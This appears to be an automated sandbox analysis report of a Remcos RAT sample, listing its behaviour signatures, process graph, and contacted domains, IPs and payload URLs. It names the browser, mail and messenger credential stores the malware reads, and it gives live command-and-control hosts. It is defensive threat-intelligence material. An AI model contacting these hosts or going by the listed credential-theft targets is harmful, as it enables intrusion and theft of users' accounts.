Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C92264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 10_2_22C92264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 19_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041739B GetVersionExW, 16_2_0041739B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 19_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 19_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 19_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 4476, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435041 Sample: PLOCMR-002 Dane dotycz#U010... Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 60 jgbours284hawara02.duckdns.org 2->60 62 jgbours284hawara01.duckdns.org 2->62 64 geoplugin.net 2->64 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 88 8 other signatures 2->88 11 mshta.exe 1 2->11         started        14 chrome.exe 9 2->14         started        17 svchost.exe 1 2 2->17         started        signatures3 86 Uses dynamic DNS services 62->86 process4 dnsIp5 104 Suspicious powershell command line found 11->104 106 Very long command line found 11->106 19 powershell.exe 15 19 11->19         started        70 192.168.2.5, 3050, 3051, 443 unknown unknown 14->70 72 239.255.255.250 unknown Reserved 14->72 23 chrome.exe 14->23         started        74 127.0.0.1 unknown unknown 17->74 signatures6 process7 dnsIp8 66 87.121.105.163, 49707, 49728, 80 NET1-ASBG Bulgaria 19->66 90 Suspicious powershell command line found 19->90 92 Very long command line found 19->92 94 Found suspicious powershell code related to unpacking or dynamic code loading 19->94 25 powershell.exe 19->25         started        28 conhost.exe 19->28         started        30 cmd.exe 1 19->30         started        68 www.google.com 142.250.80.100, 443, 49712, 49713 GOOGLEUS United States 23->68 signatures9 process10 signatures11 102 Writes to foreign memory regions 25->102 32 wab.exe 5 15 25->32         started        37 cmd.exe 25->37         started        process12 dnsIp13 54 jgbours284hawara01.duckdns.org 192.169.69.26, 3050, 3051, 49729 WOWUS United States 32->54 56 jgbours284hawara02.duckdns.org 45.88.90.110, 3050, 49731, 49732 LVLT-10753US Bulgaria 32->56 58 geoplugin.net 178.237.33.50, 49733, 80 ATOM86-ASATOM86NL Netherlands 32->58 52 C:\Users\user\AppData\Roaming\mvourhjs.dat, data 32->52 dropped 76 Maps a DLL or memory area into another process 32->76 78 Installs a global keyboard hook 32->78 39 wab.exe 1 32->39         started        42 wab.exe 1 32->42         started        44 wab.exe 16 32->44         started        46 5 other processes 32->46 file14 signatures15 process16 signatures17 96 Tries to steal Instant Messenger accounts or passwords 39->96 98 Tries to steal Mail credentials (via file / registry access) 39->98 100 Tries to harvest and steal browser information (history, passwords, etc) 42->100 48 conhost.exe 46->48         started        50 reg.exe 1 1 46->50         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.80.100
 www.google.com United States
15169 GOOGLEUS false
45.88.90.110
 jgbours284hawara02.duckdns.org Bulgaria
10753 LVLT-10753US true
239.255.255.250
 unknown Reserved
unknown unknown false
87.121.105.163
 unknown Bulgaria
43561 NET1-ASBG false
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
192.169.69.26
 jgbours284hawara01.duckdns.org United States
23033 WOWUS true

Private

IP
192.168.2.5
127.0.0.1

Contacted Domains

Name IP Active
jgbours284hawara01.duckdns.org 192.169.69.26 true
geoplugin.net 178.237.33.50 true
www.google.com 142.250.80.100 true
jgbours284hawara02.duckdns.org 45.88.90.110 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
jgbours284hawara01.duckdns.org true
  • Avira URL Cloud: malware
 unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
    		high
    https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
      		high
      https://www.google.com/async/newtab_promos false
        		high
        http://geoplugin.net/json.gp true
        • URL Reputation: phishing
        		 unknown
        https://www.google.com/async/ddljson?async=ntp:2 false
          		high
          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
            		high
            http://87.121.105.163/Subumbilical.dwp false
            • Avira URL Cloud: safe
            		 unknown
            http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin false
            • Avira URL Cloud: safe
            		 unknown